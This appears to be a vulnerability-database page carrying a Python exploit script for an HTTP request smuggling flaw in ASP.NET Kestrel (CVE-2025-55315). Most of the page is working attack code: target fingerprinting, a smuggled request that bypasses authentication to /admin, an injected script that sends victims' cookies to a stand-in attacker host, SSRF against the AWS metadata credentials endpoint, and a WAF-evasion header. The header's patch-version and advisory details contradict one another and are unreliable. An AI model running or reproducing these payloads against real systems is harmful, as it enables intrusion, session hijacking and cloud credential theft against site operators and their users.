📄 ASP.net 8.0.10 HTTP Request Smuggling / Authentication Bypass

🗓️ 06 Apr 2026 00:00:00Reported by Mohammed Idrees BanyamerType

Demonstrates HTTP request smuggling and authentication bypass in unpatched ASP.NET Kestrel.

Reporter	Title	Published	Views	Family All 163
GithubExploit	Exploit for HTTP Request Smuggling in Microsoft	24 Oct 202514:19	–	githubexploit
GithubExploit	Exploit for CVE-2025-55315	16 Oct 202510:04	–	githubexploit
Tenable Nessus	Amazon Linux 2023 : aspnetcore-runtime-8.0, aspnetcore-runtime-dbg-8.0, aspnetcore-targeting-pack-8.0 (ALAS2023-2025-1230)	23 Oct 202500:00	–	nessus
Tenable Nessus	Amazon Linux 2023 : aspnetcore-runtime-9.0, aspnetcore-runtime-dbg-9.0, aspnetcore-targeting-pack-9.0 (ALAS2023-2025-1231)	23 Oct 202500:00	–	nessus
Tenable Nessus	AlmaLinux 8 : .NET 8.0 (ALSA-2025:18148)	21 Oct 202500:00	–	nessus
Tenable Nessus	AlmaLinux 9 : .NET 8.0 (ALSA-2025:18149)	21 Oct 202500:00	–	nessus
Tenable Nessus	AlmaLinux 8 : .NET 9.0 (ALSA-2025:18150)	3 Nov 202500:00	–	nessus
Tenable Nessus	AlmaLinux 9 : .NET 9.0 (ALSA-2025:18151)	3 Nov 202500:00	–	nessus
Tenable Nessus	AlmaLinux 10 : .NET 8.0 (ALSA-2025:18152)	3 Nov 202500:00	–	nessus
Tenable Nessus	AlmaLinux 10 : .NET 9.0 (ALSA-2025:18153)	3 Nov 202500:00	–	nessus

# Exploit Title: ASP.net  8.0.10 - Bypass
    # Date: 2025-11-03
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # CVE: CVE-2025-55315
    # Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment)
    # Platform: remote
    # Type: webapps
    # Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
    # CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    #
    # Description:
    #   This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
    #   unpatched versions of .NET Kestrel due to improper handling of malformed
    #   chunk extensions (LF-only line endings). The script performs:
    #     1. Automatic fingerprinting to detect vulnerable instances
    #     2. Auth bypass to access restricted endpoints (/admin)
    #     3. Session hijacking via response queue poisoning (JS cookie stealer)
    #     4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
    #   Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
    #
    #   The vulnerability allows full remote compromise: authentication bypass,
    #   session theft, and internal network access — all from a single HTTP request.
    #
    #   Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
    #
    # IMPORTANT SAFETY :
    #   -  DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
    #   - Use only in isolated environments (VM, Docker with --network none).
    #   - All payloads are educational and non-destructive by design.
    #   - Modify payloads only within your controlled lab.
    #
    # References:
    #   - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
    #   - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315
    
    
    from __future__ import annotations
    import socket
    import ssl
    import time
    import argparse
    import json
    import os
    from typing import Tuple, Optional
    
    DEFAULT_TIMEOUT = 3.0
    READ_CHUNK = 4096
    REPORT_DIR = "kestrel_desync_reports"
    os.makedirs(REPORT_DIR, exist_ok=True)
    
    # ------------------ Utilities ------------------
    def now_iso() -> str:
        return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
    
    def hexdump(b: bytes, maxlen: int = 200) -> str:
        shown = b[:maxlen]
        hexed = ' '.join(f"{x:02x}" for x in shown)
        return f"{hexed} ..." if len(b) > maxlen else hexed
    
    def save_file(path: str, data: bytes) -> None:
        try:
            with open(path, 'wb') as f:
                f.write(data)
            print(f"[+] Saved: {path}")
        except Exception as e:
            print(f"[!] Save failed: {e}")
    
    # ------------------ Networking ------------------
    def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(DEFAULT_TIMEOUT)
        try:
            if use_tls:
                ctx = ssl.create_default_context()
                s = ctx.wrap_socket(s, server_hostname=host)
            s.connect((host, port))
            s.sendall(data)
    
            parts = []
            while True:
                try:
                    chunk = s.recv(READ_CHUNK)
                    if not chunk: break
                    parts.append(chunk)
                except socket.timeout:
                    break
            resp = b''.join(parts)
    
            s.settimeout(0.2)
            try:
                s.recv(1)
                open_flag = True
            except:
                open_flag = False
            s.close()
            return resp, open_flag
        except Exception:
            return None, False
    
    # ------------------ Request Builder (WAF Bypass) ------------------
    def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:
        headers = [
            f"{method} {path} HTTP/1.1",
            "Host: localhost",
            "Transfer-Encoding: chUnKEd",  # WAF Bypass
            "Content-Type: text/plain",
        ]
        if extra_headers:
            headers.extend(extra_headers)
        headers.extend(["", ""])
        return "\r\n".join(headers).encode() + body
    
    # ------------------ Fingerprint ------------------
    def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
        print(f"[*] Fingerprinting {host}:{port}...")
        payload = b"1\nx\n0\n\n"
        req = build_chunked("POST", "/", payload)
        resp, _ = send_http(host, port, req, use_tls)
        if resp and b"400" not in resp.split(b'\r\n', 1)[0]:
            print(f"[!] VULNERABLE: Accepted LF-only chunk!")
            return True, resp
        print(f"[+] Patched: 400 Bad Request")
        return False, resp
    
    # ------------------ Exploit Chain ------------------
    def exploit_chain(host: str, port: int, use_tls: bool):
        results = []
    
        # 1. Auth Bypass
        print(f"[!] 1. Auth Bypass → /admin")
        smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n"
        req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"])
        resp1, _ = send_http(host, port, req1, use_tls)
        if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
            results.append("Auth Bypass: SUCCESS")
            save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
        else:
            results.append("Auth Bypass: FAILED")
    
        # 2. Session Hijacking
        print(f"[!] 2. Session Hijacking → JS Stealer")
        js_payload = (
            b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n"
            b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n"
            b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
        )
        req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload)
        send_http(host, port, req2, use_tls)
        results.append("Session Hijack: INJECTED")
    
        # 3. SSRF
        print(f"[!] 3. SSRF → AWS Metadata")
        ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n"
        req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf)
        resp3, _ = send_http(host, port, req3, use_tls)
        if resp3 and b"role" in resp3:
            results.append("SSRF: SUCCESS")
            save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
        else:
            results.append("SSRF: FAILED")
    
        return results
    
    # ------------------ Reporting ------------------
    def save_json_report(host: str, port: int, use_tls: bool, results: list):
        report = {
            "target": f"{host}:{port}",
            "tls": use_tls,
            "timestamp": now_iso(),
            "cve": "CVE-2025-55315",
            "status": "VULNERABLE",
            "waf_bypass": "chUnKEd",
            "exploits": results
        }
        path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
        with open(path, 'w', encoding='utf-8') as f:
            json.dump(report, f, indent=2)
        print(f"[+] JSON Report: {path}")
    
    # ------------------ CLI ------------------
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("target", help="host:port or host:port:tls")
        args = parser.parse_args()
    
        parts = args.target.split(":")
        host = parts[0]
        port = int(parts[1])
        use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")
    
        print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n")
    
        is_vuln, _ = fingerprint(host, port, use_tls)
        if not is_vuln:
            print("[+] Target is patched. Exiting.")
            return
    
        results = exploit_chain(host, port, use_tls)
        save_json_report(host, port, use_tls, results)
    
        print(f"\n[+] Exploitation chain completed!")
        print(f"[+] All files in: {REPORT_DIR}")
    
    if __name__ == "__main__":
        main()

06 Apr 2026 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.19.9

EPSS0.66258

SSVC